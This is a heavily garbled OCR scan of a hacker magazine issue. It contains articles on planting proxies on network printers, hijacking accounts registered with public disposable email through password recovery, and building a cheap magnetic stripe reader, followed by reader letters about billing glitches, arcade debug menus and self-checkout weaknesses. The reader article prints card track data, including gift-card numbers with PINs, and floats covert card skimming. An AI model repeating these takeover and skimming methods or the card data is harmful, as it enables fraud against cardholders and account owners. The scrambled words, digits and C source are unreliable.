\ that Iwas finding. Ikept seeing references t o something called Chai Java. This got me interested again. Could it be t h a t some o f these printers actually had a java virtual machine built i n t o them? That would mean t h a t a n y code Iwrote could be run from a printer, b u t more importantly a printer inside a target network. After playing found that, yes, this really around a b i t more I was possible. From the web server on these printers you can upload code t o be r u n on t h e printer. Chai Java is still i n i t s infancy b u t already it i s possible t o run a l l sorts o f interesting things. Most importantly, an important step has been removed. The most difficult step i n breaking i n t o a network has always been f i n d i n g a way past the firewalls. Suddenly instead of searching for a vulnerable machine, an intruder can simply connect t o a printer's web site and upload a proxy. As far as security goes it's as bad as having internal network jacks on the outside wall o f your corporate headquarters. Shouts of course go out t o DarkLordZim, Brutallnquisition, Razorwire, a n d the rest o f the crew on mediamonks.


by StankDawg stankdawg@stankdawg.com The spam epidemic has gotten horribly out of control. We a l l know that. Many solutions are bei n g attempted t o avoid spam from legislation t o technical alternatives. Filtering is not an exact science and it never w i l l be. Blacklisting sites and servers is unrealistic because one server can be tainted by one user. Another recent phenomenon has been the onset of "disposable" email accounts. Some sites that offer these services are dodgeit.mm and mailinator.com but there are several others scattered around the web. A disposable email account i s one that i s not consistently used or tied t o an individual person. Personally, Ihave created accounts on my own server for this very purpose and then deleted the account after Iwas done with it. Not everyone has the luxury of having their own server t o do this. To meet that need, some sites have appeared that allow any user t o create a disposable account t o get a reply or information without fear

of the influx o f spam t h a t may result from requesting information from some site. You could use this t o sign u p t o a mailing list for example. You can then check i n on that account t o read the mailing l i s t without fear of them selling your address around t o other lists or spammers. You might also use t h i s as a one-time disposable message center. Perhaps you want t o post t o a site and want replies t o a question but not get flooded with responses o r have your real email address made public. These are perfect examples on how and why t o use this type of account. Specifically, the mailing l i s t example i s a good way t o add RSS content t o your site without the spam. Many of these sites (dodgeit.com for example) generate a news feed using RSS t h a t you can add t o your site. Mailing list content t h a t you control! Keep i n mind t h a t due t o t h e nature o f these systems, they provide free access for anyone t o use them a t any time. This means t h a t these disposable email sites do not have account valida-

6 o n of their own. That could be an ironic mess! What they do is allow anyone t o access any account at any time. That way, there are no passwords t o deal with and no account set up of any kind. Anybody can use the service and nobody i s excluded. It's a spam solution for everyone! This leads me t o the first problem with these systems as they are now. Once again, due t o the nature of these systems, they are meant t o be disposable and used as described above. Disposable accounts were not intended t o be used for any type of real mail usage although, theoretically, they could be. That is why I them "discall posable." I n fact, you will find that there i s no delete function on these services. What need would there be for a delete function on a disposable account anyway? The system will delete files every 30 days or whatever the system i s set for. Another reason t o not have a delete function i s the fact that Imentioned earlier about anyone accessing any otheraccount. All it would take is a few ne'er-do-wells t o go i n and delete your confirmation messages before you can get t o them. Someone could even delete everything i n your mailbox just t o be a jerk. I f you think that would be too hard t o maintain and figure out, trust me when I e l l you that it could easily be scripted t o t do this with no manual intervention. This i s not even the biggest problem with these systems. It is the misuse of them that could really get you Owned. The big mistake that people make with this kind of account is that they t r y t o use it for things that quite simply, they should not. Some people may think that registering for a forums site or a CMS (content management system) with a disposable account may be a good idea t o avoid potential spam or revealing their real email address i n a questionable environment. But understanding how a forum works is crucial. I f the forum doesn't validate any emails, then it w i l l be fine. Most forums, however, will make you validate the email address by sending a confirmation password t o that address that you must enter t o complete the registration process. There you go sharing your account information, including password, with the world. Since that disposable email account is open t o the world, anyone can check your mail. All they need t o know i s the account name. I f they registered with a forum site for example, it can easily be looked up i n the members list. Go back and check their "disposable" email account and see if they left the email there. Remember, there i s no delete feature on these systems! I f it is still i n the system, you will see the site and the password. People who are using a disposable email , account t o register for a site are usually too lazy

can t o change their password. I t e l l you as a mat: ter of fact that this happens quite frequently. Ako, keep i n mind that these services are web-based. "So what?" you may say. Well, i n the example above Imentioned that if you noticed someone at a site or went digging through a site for those email addresses you would find them. No one really wants t o manually search for people. So we look t o automate things. Since these are web services, guess what crawls out every so often and picks them up? That's right, spiders from search engines! I f you haven't already dropped this article t o t r y it, stop and do a Google search for "@dodgeit.com" and see what you can find. I f the site is designed properly, they will prevent spiders from finding the actual mailboxes on the disposable email site (which they do) but other sites where people are posting or using the disposable email addresses usually do not. Ialso want t o emphasize that just because the initial emails with passwords may have been rolled from the system, that doesn't mean anything. There is a fatal backdoor that exists here. It is actually the true definition of a backdoor! Even if you miss the original confirmation email, or even if they changed their password right away as suggested, almost every site offers a password recovery system for their users. All a person would have t o do is go t o t h a t password recovery request and have a new password sent t o the original email address, which i s...you guessed it, public!Any account that has been registered with any of these "disposable email accounts" can be backdoored. And if you think this isn't a danger, imagine the identity t h e f t that could take place! Opening eBay accounts under your account, changing other information on a site, the list goes on. This is not only an open invitation for a person t o have their account owned and be spoofed by someone eke. It could actually be worse than that. Those of us who run websites may now have people using the system who have taken over someone else's account. They are now i n the system, with no valid email, so that they can wreak havoc on your system if they wanted t o without fear of repercussion. Obviously, you could check the logs but they simply use a proxy t o avoid detection without much deeper means of investigation. What can and should be done about these problems? Well, that i s for you t o decide. As a user of these services, Ican simply recommend that you be careful and think out the dangers of using them. Do not put any personal information on them or have personal information sent t o them. Do not use them t o register with sites



G e r e your password w i l l be mailed t o you. I f you do, for crying out loud go check the email right away and then go i n and change your password immediately! Doing t h a t will keep you from being spoofed on a site but it still lets the world now that you are registered a t that site, so you have lost some privacy i n general. Keep that i n mind when you register for your assorted prOn sites. What if you are a webmaster o f a site and you are concerned about this? You also have t o make your own choices. You may decide t o not allow users t o register from these known sites. Many sites do not allow yahoo or hotmail or other public mail account users t o register. These sites can be treated the same way. You can send your passwords encrypted somehow but this makes it tougher for non-tech sawy users t o complete registration. It would, however, be safer for your site. Certainly you should force your users t o change their password immediately when they register so they do not leave t h a t default password working. Finally, I not see with so many public email do services available, why people don't just create a new Gmail account or yahoo account or hotmail account. The list of options is endless. These accounts would be password protected but you could still treat them as disposable accounts. Use them once, then forget about them. Register them against the disposable services Listed above for two layers of protection! That little extra step will pay off. But instead of using Gmail or yahoo, we decided it would be better t o just create our own service. When Ifirst wrote this article, Ioriginally suggested that the reader could set up a new mail service that could eliminate the problems mentioned earlier. It so happens t h a t I had a domain registered just as a test bed for different projects that we work on. I thought it would be a good idea t o turn this site i n t o a disposable email service that actually protected your privacy and anonymity while providing spam protection. The fact t h a t it creates a funny email address i s a bonus. It was a simole matter of desianina a


\ database that interacted with t h e mail server t o automatically create temporary accounts on t h e mail server and delete them after a certain amount o f time. What makes this service different? Firstly, it offers password protection! Secondly, it offers the ability t o delete emails. Both o f these are offered through a web mail front-end t h a t no one else can access without a password. What this also does i s lock t h e backdoor. Sending password change requests will not work f o r t w o reasons. One, they will not have t h e password t o your account (unless you do something stupid), and two, the accounts a l l have expiration dates! The whole point o f a disposable email account i s t h a t it be temporary. We designed our database t o have a user-defined expiration d a t e (seven days maximum) for the account time-to-live. After t h e expiration date i s passed, t h e account i s deleted by a cron job and permanently locked i n the database t o prevent it from ever being used again. This includes the original user. If you wanted a reusable account, t h e n you shouldn't have used a disposable email service. We designed the database to be very simple, yet powerful at the same time. I t only keeps the minimum amount of data t o automate the service, and the password i s not o n e o f them. That i s handled by the mail server alone t o avoid another point of attack. We are using a web mail client (still undecided a t this point, b u t probably squirrelmail) t o handle the interface, so t h a t code base was already done; we simply implemented it. Nick84 wrote the base code a n d we a l l worked together modifying it from there. The site i s tested and up and running, so please feel free t o use it. It i s a free service from t h e DDP t o help protect your privacy and avoid spam. We use it. We like it. We hope you do too. Further research: dodgeit.com, mailinator ,.corn, Google "related:", wil1hackforfood.biz. Shoutz: The DDP, particularly nick84 for writi n g the base code, ld@blo, Decoder, lucky225, sauirrelmail. ora.

Four new pages have been added as of this issue! They are Pages,61, 62;\63, and 64. Please do your'best tcv make them feel a t





by Red bird redbird@2600.com Good magnetic stripe readers are hard t o come by. Most are expensive, only capable of reading one or two tracks, and have inconvenient interfaces. I n this article I w i l l describe the process of making an extremely cheap, simple, and reliable single-track reader from parts that are readily available. We w i l l be interfacing the reader t o the microphone input of a sound card, which is very convenient for use with most laptops and desktops. Iwill not be discussing the theory and concepts of magnetic stripe technology and the assumption is made that you are somewhat familiar with the topic. For a simplistic overview of magnetic stripe technology that is easy t o read and understand, I recommend that you read the classic article "Card-0-Rama: Magnetic Stripe Technology and Beyond" by Count Zero, which can be found quickly by doing a web search for keywords i n the title. Materials Below is a list of materials you'll need t o construct the reader. Magnetic head. Magnetic heads are extremely common. Discarded cassette tape players contain magnetic heads of almost the exact size needed (the small difference won't matter for our application). Simply obtain a discarded cassette tape player and remove the magnetic head without damaging it. These heads are usually secured with one or two screws which can be useful when building the reader, so don't discard them. 3.5mm mono phone plug (with 2-conductor wire). You can find this on a discarded monaural earphone or i n an electronics store. Soldering iron with solder. Optional: Wood (or other sturdy material) base t o mount magnetic head. Ruler or other straight edge t o slide cards on. Construction The actual hardware design i s incredibly simple. The interface consists of simply connecting the output of the magnetic head directly t o the mic input of a sound card. Solder the wire connecting the 3.5mm mono phone plug (base and tip) t o the leads of the magnetic stripe head. Polarity does not matter. I recommend that you mount the head i n a way that makes it easy t o swipe a card over it with

a constarit velocity. This is where your custom hardware ingenuity comes in. Mount a ruler (or other straight edge) perpendicular t o the magnetic head, with the reading solenoid (usually visible as a black rectangle on the head) at the correct distance from the base for the corresponding track. Track 1starts a t 0.223" from the bottom of the card, Track 2 starts at 0.333", and Track 3 starts a t 0.443". Alternatively, you can purchase a surplus reader with no interface (i.e., scrapped or with a cheap l l L interface) and follow the same instructions with the exception t h a t the magnetic head will already be mounted. Most surplus readers come preset t o Track 2, although it is usually a simple hardware mod t o move it t o the track you'd like t o read. This will save you the trouble of building a custom swiping mechanism and will also improve the reliability o f the reads. There are surplus readers t h a t can be purchased for less than $10 US at various online merchants. Software I n this project, the software does a l l the h e a y lifting. The "dab" utilityincluded i n this article takes the raw DSP data from your sound card, decodes the FSK (frequency shift keying a.k.a. Atkin Biphase) modulation from the magnetic stripe, and outputs the binary data. Additionally, you can decode the binary data using the "dmsb" utility (available i n the "code" section of the 2600 website) t o output the ASCII characters and perform an LRC check t o verify the integrity of the data, provided that the stripe conforms t o the specifications described i n IS0 7811, 7813, and optionally IS0 4909 (for the uncommon Track 3). Becoming familiar with these specifications will help you understand the contents of the magnetic stripe when viewing the decoded data. The provided software is more proof-of-concept than production code, and should be treated as such. That said, it does i t s job well. It is open source and released under the MIT license. Feel free t o contribute. Requirements Linux (or the desire t o port t o another operating bsystem) A configured 16-bit sound card Access t o the/dev/dsp device libsndfile Note that "dab" can also take input from any audio file supported by libsndfile. However, it

G s t be a clean sample that starts at t h e beginning of the file. This is useful t o eliminate the requirement o f a sound card and allow samples t o be recorded from another device (e.g., an MP3 player/recorder) and decoded a t another time. Compiling Edit any configuration #defines near t h e top of the dab.c file and proceed t o compile t h e source with the following command^
cc dab.c
-0 dab


Usage f o r dab.c
-a, --auto-thres Set auto-thres percent rage (default: 30). -d, --device Device to read audio data ,rm fo (default: /dev/dsp). -f, --file File to read audio data from ,ue (s instead of -d). -h, --help Print help information. -m, --max-level Shows the maximum level @(use to determine threshold). -s, --silent No verbose messages. -t, --threshold Set silence threshold ,(default: automatic detect). -v, --version Print version information.



My current leader, made o f a modified surplus reader which is only capable o f reading the three standard tracks. Examples Below are some examples o f a few (hopefully) less common cards so as t o get a n idea o f the sort of data you're likely t o find.
Park Inn (Berlin-Alexanderplat z ) Door Key Cards Room: 2006 Checkout Date: 12/30/2004 Card 1 Track 2 Data: 5101152006010912130124000120000000000 Card 2 Track 2 Data: 5101152006020912130124000120000000000 Room: 2005 Checkout Date: 12/30/2004 Card 1 Track 2 Data: 5101152005010160230124000120000000000 Card 2 Track 2 Data: 5101152005020160230124000120000000000 SEPTA Monthly Transpass Cards Month: NovemBer 2004 Serial: 001467 Track 2 Data:

My original reader. With this reader Iwould use a ruler as a track guide. This way I could not only read the three standard tracks, but also data on non-standard cards, some o f which have tracks i n odd positions such as through the middle of the card.
\ S p r i n g


iq '


610100110104113004000001467 M o n t h : J u n e 2003 S e r i a l : 002421 T r a c k 2 Data: 010100060103063003000002421 M o n t h : J a n u a r y 2002 S e r i a l : 028813 T r a c k 2 Data: 010100010102013102000028813
Sony Connect Cash Cards C a r d Number: P I N : 9014

603571 010462 1134569

T r a c k 1 Data: B6035710104621134569A~49120000040 Track 2 Data: 6035710104621134569=49120000040 C a r d Number: 603571 010462 1132282 P I N : 5969 T r a c k 1 Data: B6035710104621132282~~49120008147 T r a c k 2 Data: 6035710104621132282=49120008147 S t a r b u c k s Cards C a r d Number: 6015 0613 2715 8426 T r a c k 1 Data:

B6010565061327158A0040/MOMSDAY04~2501 ~0004000060018426 T r a c k 2 Data: 6010565061327158=25010004000060018426 C a r d Number: 6014 5421 5637 9529 T r a c k 1 D a t a : B6010564542156377^0027/ ~EXCLUSIVEB2B04A25010004000060019529 T r a c k 2 Data: 6010564542156377=25010004000060019529 C a r d N u m b e r : 6014 5421 6302 5757 T r a c k 1 D a t a : B6010564542156377^0027/ bEXCLUSIVEBZBO4~25010004000060019529 T r a c k 2 Data: 601 05645421 63027=25010004000060015757

This project was originally started for the New York City MetroCard decoding project that you may have heard about on O f f The Hook. Nearly a l l commercial readers are unable t o dump the raw data as it exists on the MetroCard and, even if they could, they are priced way above our (and most hobbyists') budget limitations. This solution has worked very well for us and can aid you i n reverse-engineering cards that you may have as well. The "dmsb" application available online can be used for simply decoding standard cards that you have laying around as well. While my construction example demonstrates a fairly straightforward and typical use of a magnetic stripe reader, many other uses can be considered. For instance, since a l l the data obtained from the reader itself is audio, the device can be interfaced t o a digital audio recording device, such as


one o f the many MP3 (and other codec) player/recorders on the market. You could then set the device t o record, interfaced the same way with the magnetic stripe reader, and have a stand-alone reader small enough t o fit i n your pocket. Later, you'd view and edit the captured audio file, saving the clean waveform t o a standard .wav file t o be analyzed with "dab" (which, i n fact, has this capability). You can even construct the reader i n an inconspicuous way, so onlookers would never realize the device's capability. How is this significant? Reading boarding passes with magnetic stripes is a perfect application. These are generally only available i n the waiting area of airports. They're issued at checki n and collected when you board, leaving a very small time margin during which the stripe can be scanned. I n my case, I had been flagged for additional security and the infamous "SSSS" was printed on my pass. Using my reader, I was able t o duck into a bathroom and quickly read the data i n t o my mp3 player/recorder for Later analysis. (I discovered a mysterious code on track 2 (normally blank) which read: "C 13190-2******" as well as an "5" a t the end o f the passenger data on track 1.) But there are other more sinister applications. What if one o f the waiters at your favorite restaurant built this device and swiped the card of everyone who pays with credit? From the data obtained, an exact clone of the credit card could be created. Credit card fraud would quickly become out of control if this were commonplace. The same principle could be applied t o reverse-engineering an unknown magnetic stripe technology. While individual card samples are often much more difficult t o obtain, scanning samples as you obtain them enables you t o gather samples at an astonishing rate. This way, supporters can loan you cards t o scan on the spot. I have personally used this method for the MetroCard decoding project and it works extremely well. Icould go on and on with more examples of the implications of this sort of design, but I ' d like t o hear back from the readers as t o what other ideas may have been thought up. All feedback i s appreciated and, time permitting, a l l questions will be answered. Hopefully this project makes you realize how certain types of technology are priced way above what they have t o be t o keep them away from "us" because of the fear of malicious use. I also hope it encourages more projects like this t o surface so we can learn about and use technology without the restrictions imposed upon us by big corporations.



dab." Decode Aiken Biphaae Copyright ( c ) 2004-2005 Joseph Battaglia <redbird@2600.com> Released under the NIT License. Compiling: cc dab.= -0 dab -lendfile



I. ** defaults +* .I #define DEVICE "Idevldsp' I* default sound card device +I #define SAMPLE-RATE 192000 I default sample rate (hz) *I ' #define SILENCE-TERES 5000 I in~tialsilence threshold . . I I*** end defaults *I " I #define DISABLE-VC ' ' I #define AUTO-Tunes #define BUF-SIZE #define END-LENGTE #define FREQ-THE5 #define MRX-TERM Xdefine VERSION 30 1024 200 60 60 "0.6" I* disable velocity correction if defined *I I* I* I* I ' I* I* pct of highest value to set silence-thres to *I buffer size * I msec of silence to determine end of sample *I frequency threshold (pct) ' I sec before termination of print-max-level0 *I version * I

short int *sample = NULL; int sample-size = 0; I* allocate memory with out of memory checking [size] allocate size bytes returns pointer to allocated memory *I void *xmalloc(aire-t s ~ z e )

void 'ptr; ptr = malloc(aize); if (ptr == NULL) { fprintf(stderr, ''Out of memory.\n"); exit(EXIT_FAILURE);

return ptr;

I* reallocate memory with out of memory checking [ptrl memory to reallocate [size] allocate size bytes returns pointer to reallocated memory *I va~d .xrealloc(vaid 'ptr, size-t sire)


void *nptr; nptr = realloc(ptr, size); if [nptr == NULL) ( fprintf(8tderr. Out of memory.\n"); erit(EXIT_FAILURe);

return nptr;

/ + copy a string with out of memory checking [string] string to copy returns newly allocated copy of string *I char *xstrdup(char *string) char +ptr; ptr = malloc(strlen(~tring1 + 11; strcpy(ptr. string);


return ptr;

I* read with error checking [fdl file descriptor to read from [bufl buffer byte8 to read [count1 returns bytes read *I ssize-t xreadqint fd, void .buf, size-t count)

int retval; retval = readlfd, buf. count); if (retval == -1) { perror("read( I " ) ; exit(EX1T-FAILURE);

return retval;

I* prints version [stream] output stream *I void print-version(F1LE retream)


fprintflstream, "dab Decade Aiken Biphase\n"); fprintf(stream, "Version % ~ \ n "VERSION); ,


Continued o n page 4 1




Research Results
Dear 2600: This is t o comment on Lori and t3st-s3t's submitted observations i n 21:3 about t h e "weird" number that gives off a list o f digits and tones and then reroutes t o a busy signal. The numbers were 1-800-506-3553 and 1-800789-6324. I myself had an encounter with one of these numbers. I was scanning for extenders and came across was able t o have it produce 900 16 7 1-800-877-6533. I 1 5030974. I 1 called the number on February 21, 2004 a t 1:00 P.M. Icalled it again numerous times within the course of the hour and it punched off 900 3 7 1 1 5030974 and then 1 and then 4. So pretty much its out, 1 line is 900 X(X) 7 1 5030974. I n 21:3 t3st-s3t marked the outline as 200 (XX) 7113267347. Upon further notice you can see that the only similarities i n these outlines i s (XX) 7 1 . Potentially the 900 and 200 could be state or 1 area assignments and the 5030974 and 3267347 could be trunk pairs? Once I documented these numbers I signed onto the irc.2600.net sewer and chatted with a few friends. We believe that it could potentially notify t h e caller of their trunk pair's number. Also, i f anyone knows anything about AT&T1s Easy Reach 800 service I'd like t o know. Icalled up an 800 was number and was prompted for a password. I thinking it was an extender because it only requested a two digit login. I eventually located it, but I not disclose it for will the client's sake. Ilearned it's a toll-free service t o reach someone remotely, but I'm assuming that there are other capabilities. The Neuralogist I n our latest experiments on the "weird" numbers we were gn eg it a suffix o f 4086584 with prefixes o f 897, 898, 903, and 914 on the 3553 number. For the 6324 number we g o t a suffix o f 3267347 with prefixes ranging from 215 to 228. As always, 711 was sandwiched between the prefix and suffix. A l l o f this was identical to what we g o t i n the fall. What AT&T Easy Reach offers is basically a toll-free number that consumers forward to their homes, offices, o r cell phones. One o f the features which supposedly makes it harder for outsiders to call them is the implementation o f a PIN which, as you mentioned, is a grand total o f two digits. We wouldn't call it the ultimate way to keep people out. Dear 2600: For t h e last ten months Iwas using a prepaid cell phone through Verizon Wireless. (Verizon's prepaid service sucks!) Anyway, I finally got a new cell phone and plan. But I still had a l o t o f games and ring tones on the old phone that Icouldn't add t o my new phone. (Both are Verizon phones.) Iused Verizon's Get It Now t o get the games, apps, and tones. This s e ~ c is kind of cool but is a waste of e money most of the time. When my prepaid account ran ( o u t o f funds, Icould no longer make or receive any

phone calls on thc oid phone. But then one night by accident while playing Tetris connected t o t h e Get It Now network. on my old phone, I I able to download any game, program, ringtone, or was picture free ofcharge!I have n o t added money t o the old phone i n two months and Ican still connect t o Get It Now and download anything, and I never billed for it. am This must be some glitch on Verizon's prepaid phones. Also, Ibought a US5 cable that connects my old phone t o my computer. Even though I can't make or receive any normal "voice" calls, I still use my old cell can phone as a modem for my computer. I can use Windows HyperTerminal t o call other modems or fax machines, or I can call some o f those free Internet providers like Net Zero t o connect t o the net from my Laptop when I'm not a t home or when my cable modem goes out. I'm not sure why Verizon is still allowing me t o make data calls from my old phone without billing me for them. And Idon't can understand why I make data calls b u t not voice calls. Have you heard o f anything like this? And ifVerizon finally realizes how much stuff Igot made, do you from Get It Now and a l l of the data calls I think they would be allowed t o b i l l me for them? Would I be responsible for paying for t h e subscription charges and t h e data calls Imade? Imeans it's their fault, not mine. Idid not sign or agree t o any contracts or anything. It was a prepaid service. Dyslexic-Hippie I f y o u didn't sign anything, then it's likely that Verizon doesn't even know who you are. And even if they did, they would have to somehow prove that you still had your phone and were still using a service that you technically no longer had. And after that, it would still be their responsibility to terminate prepaid service, n o t yours. But we really doubt this little bug will last much longer anyway.

Dear 2600: Recently, whilst shopping i n an Albertsons store here i n Texas, I came across one t h a t had a Blue Screen of went by t o check on it over the next week. From Death. I what I could tell, it runs on Windows 2000 using a piece of software by NCR. Options i n the menu included looki n g at the amount of cash i n t h e machine and testing it out. It Let me quit the program as well via the touch screen. I didn't get much more of a chance t o work with it as Ididn't have much time. But I would appreciate anyone who could give more information. The Grand Master of Confusion Dear 2600: I'm really nothing o f a hacker. But I occasionally do enjoy tinkering around with computers and electronics t o see what happens. Igot a great opportunity t o do this a few months back. I was a t a bar with some close friends, may not be too accurate with some of the which is why I details. We were sitting by one o f those newer Golden Tee games (perhaps the 2004/2005 version, I'm not sure). I had noticed that midnight had come and gone and be-

6 r e long saw that the game was no longer on the Attract mode that it had been on all night. Instead, it was on a debug type menu. can't figure out why it went into For the life of me I this mode. It wasn't any special day, not the first or middle or Last of the month. It didn't seem like it was around any specific time, maybe 12:30 centraltime. You could move around using some of the various figbuttons, or even up and down with the rollerball. I ured out which button was the Enter key and I on my was way. I t o be careful not t o get out of the debug behad fore I was done seeing all that was going on i n there. From the looks of it, I could have changed the message displayed on the overhead scrolling LED, but I doubt anyone would've noticed. ( I hate when good comedy goes unnoticed!) There was a surprisingly Large amount of menus, but for a game that has t o connect t o the Internet somehow Iguess this made sense. I ended the session after Iturned the volume up a b i t (it wasn't that Loud i n the bar but it was basically muted) and found a way t o turn on free play. I amazed that it worked but was sure enough, once I exited a l l 1 had t o do was keep pushing the add player button t o get the credits high enough so that my three friends and I could enjoy a full 18 holes. Which we didn't - the place closed down before we could. At a different bar, Ilooked around t o see if there was perhaps some button or reset switch or any button combination that would take you into the debug menu, but t o no avail. I would have loved t o have spent some more time looking about i n there, but a t the first bar the game was pretty much i n plain sight and I didn't want a suspecting waitress t o kick me out for "breaking" their game. CatWithTheGatt Based on what you told us, it seems as if the bar closed a t around 1 am. I f somehow they had set this thing to go into debug mode a half hour after the bar closed, it would make a degree o f sense. Then, if they didn't reset the system clock once Daylight Savings Time ended, debug mode would be entered an hour earlier while the bar was still open. All o f this is assuming that this is how the system works and that someone didn't p u t it into that mode manually.

\ sultants out there with a proven track record winning jackpots for schools so that they (the schools) can afford textbooks and course materials. I've interviewed a couple of consultants and have reviewed t h e i r game tickets and modus operandi. It's not surprising t h a t these consultants are often engineers who enjoy t h e study of numbers and their behaviors. Playing the lottery can be a good thing if done i n moderation and if the player has a n understanding of the dynamics/challenge involved. And if one paper plays, like people do i n commodities t o learn t h e a r t of trading, it doesn't have t o cost anything. You can always wager real money when the jackpots are b u i l t up, on average, every two t o three months. Additionally, different lottery games offer better odds. Ultimately, choosing a game with some forethought makes prudent sense. We also need t o keep i n mind t h a t our involvement i n games teaches us obscure skills f o r complex problem solving! I enjoy your magazine. It's helped me with creativedivergent thinking. Ruth (QuanturnResearcher) Lottery consultants winning jackpots so schools can buy textbooks? What a bizarre concept.
Dear 2600: For several issues now people have created rather convoluted ways of getting their I n t e r n e t I P address when it changes due t o having a dynamic address. Updating a website or having the address emailed t o them is reinventing the wheelwhen dynamic DNS services exist Like that on dyndns.org. This site gives you a domain name for free from many they have available like mine.nu. So your address would be s0mename.mine.n~. On your box you run a daemon which updates your Internet IP a t dyndns whenever it changes. There are free programs t o do this or ones that cost money. Now when you need t o access your computer/server from t h e Internet, just use your domain name (s0mename.mine.n~) and it will always point t o your dynamic IP. http://www.dyndns -.org/services/dyndns/ chuck Dear 2600: I actually able t o provide a b i t o f Light a t the end am of the tunnelfor students Laboring under restrictive policies and asinine rules about network security. Irecently found multiole vulnerabilities i n mv school's private network, vulneiabilities that were m u i h more cdmplex than iust adminladmin loain combinations. While Idid duti?ully report it t o the-IT department o f my school, they just asked i f I could come i n and explain i t t o the network felt administrator. I slightly nervous because if this guy thought Ihad "hacked" the system, then Icould have went i n and t h e people were surbeen expelled/sued. I prisingly friendly, not accusing me o f hacking or any other such stuff. They agreed t o patch t h e security holes and thanked me for my time. They d i d this even though I could have potentially stolen admin access t o our network and consequentially SSNs from t h e students. This is especially dangerous because Igo t o a private school which, while having a diversity of economic classes, also has students who probably have i n excess o f several hundred thousand dollars i n their bank accounts. Iam fairly sure that the admin knew Icould have done this, but he still thanked me f o r my time and comPage

Further Info
Dear 2600: This is i n response t o the article "How To Hack The Lottery" i n 21:3. It should be pointed out that although the odds of winning the Lottery could be viewed as staggering, i n the mathematical sense, as the author points out, the remarkable news is that the odds never ever remain constant! This is due primarily t o component tolerances (high or low). Tolerance, therefore, imparts a "mechanistic effect" i n a drawing. For example, i f the Lottery uses ping pong balls, the number one ball theoretically would be lighter than the number 16 ball. The number 48 ball may be heavier than the 16 ball. Even i f a computer is used i n a drawing (no ping pong balls), component tolerances would possibly still have an effect on the odds. There are also intervening factors (non-mathematical) which have a significant effect on lottery odds: skillset, strategies employed, luck, foresight, organization, and so forth. There are a few Legitimate lottery con-


3 3 1


mended me for making the network secure. Hopefully this will be a beacon of hope or something t o students everywhere. Steve

Dear 2600: As one of the poor souls who happen t o work i n and around the airline industry i n these times I say that can some of your points about the "selected" process is wrong. You are right that if you see four S's on your boarding pass that you have been selected for random screening, but at the same time there are ways out of it which I'llget into. You stated that people are targeted for the type of clothes they wear or what kind of hairstyle they have. That is incorrect. Most of the time a person receives the S's on their boardina Dass because thev buv a one-way ticket (most hijackers'have historical[; d i n e this), paid cash (once again history backs this up), are going t o a "hot spotMdestination, are (the worst one yet) transfers from another airline, or somehow are on the government watch list. When you travel and see these S's on your ticket, your ticketagent can remove them i n most cases. When talking t o the ticket agent remember t o be polite and friendly. If you're not they can make your trip pretty bad. If you are military traveling under orders you can easily get this removed by showing your I D and orders. I f you happen t o share the name of someone on the watch list, contact your local FBI branch and they might be able t o get your name off the list. This does work as I have seen it done. While I don't like all the rules set i n place I see a do need for some of them. When traveling remember that the rules aren't meant t o restricttravel, just t o make sure that it is done safely. Mouser-inc While the reasons you give are certainly used to justify additional screening, people are also targeted because o f the way they look or act. The latter is most likely done by humans and the former by machines. But i n all cases, it's pretty ineffecfive as anyone with an evil motive and halfa brain can easily alter any o f these parameters. Where the screening process is effeh've is i n getting the traveling public programmed to accept this kind o f treatment since it's allegedly being done to keep them safe. Dear 2600: Servus Casandro asked about writing an article on satellite television outside the U.S. There is already freeto-air information published. Anyone with an IRD digital down converter, a satellite dish, and an understanding of how t o peak an antenna on a satellite with the appropriate LNA/LNB should look at http://www.globalcm.net/mpegZcentral.html. haydenlh Dear 2600: Patrick Madigan's article i n 21:4 regarding the removal of Ad-ware using various tools was fantastic. However, as a sysadmin who's run into his fair share of users who click "yes" t o just about anything under the sun, there's one thing I'd like t o add. Most spyware/adware hangs out i n the Temp directory, under the Local Settings folder on a machine (a hidden folder i n c:\Documents and Settings\<user name>\Local Settings\Temp\). Going into an infected computer i n Safe Mode and navigat-

ing t o this directory usually reveals quite a few executables (as well as a slew of temp files that aren't really needed). Occasionally, spyware also lurks i n the c:\Documents and Settings\<user name>\Application &Data\ folder as well, but it's a little more dangerous t o start removing software from there as there might be something you need. The best way I've found to remove adware/spyware is t o install your spyware removal tools of choice (Spybot Search and Destroy/Ad-Aware/CWShredder/Hijack This). Then, reboot i n Safe Mode, go t o the Add/Remove programs applet, and uninstall anything you find i n there that you don't want. Then navigate t o the Local Settings\Temp folder Imentioned above and clean it out. Then run your choice of spyware removal tools. Once these are done, YOU may Want t o navigate t o the registry t o check theRun that Patrick mentioned (HKw~C~rrent~USER\Software\Microsoft\Windows\Current -Version\Run). Good luck! Mogus Dear 2600: After writing the Article "Selfcheckout or ATM?" i n 21:4 I a little more exploration with the NCR E-Series did have found that if you press the Selfcheckout systems. I help button before starting your order (or selecting a language) it w i l l give you the choice of "Login" or "Call for Help." During this time you can put anything you want into the bagging area without alarm. Hitting the "Go Back" button will recalibrate the scale before the order is started. Bob Krinkle As always, it's a bad idea to actually try and get away with physically stealing items. But learning where the weaknesses are i n these machines is quite fascinating.

Dear 2600: One day I messing around trying t o get netmeetwas i n g t o work so an anxious friend could test his new mic. I bypassed my router and connected directly t o my computer's NIC. I noticed that for the first time i n ages my WAN IP address had changed. Curious like most, Irebooted the modem t o see i f it changed again. It didn't. So I connected back t o my router, rebooted the modem had and voila, there was the old IP address again. I nothing better t o do so Icloned the MAC from another NIC and it got a new, different IP address. Each MAC Ientered into the router's WAN side, fictitious or real, retained a unique IP address that it pulled back after numerous MAC changes and reboots. I s this normal?

Yes, this is normal. DHCPservers assign I P addresses based on the MAC (physical) address requesting it. I f y o u change your MAC address, the DHCP server will assign you a different I P address. Change the MAC address back and you'll be assigned the original address, provided the lease did not expire. Be careful, though. ISPs noticing this acfivity tend to get upset and may suspend your accti ty i Most count, requesting an explanation o f this av. terms o f service allow only one I P address per account.


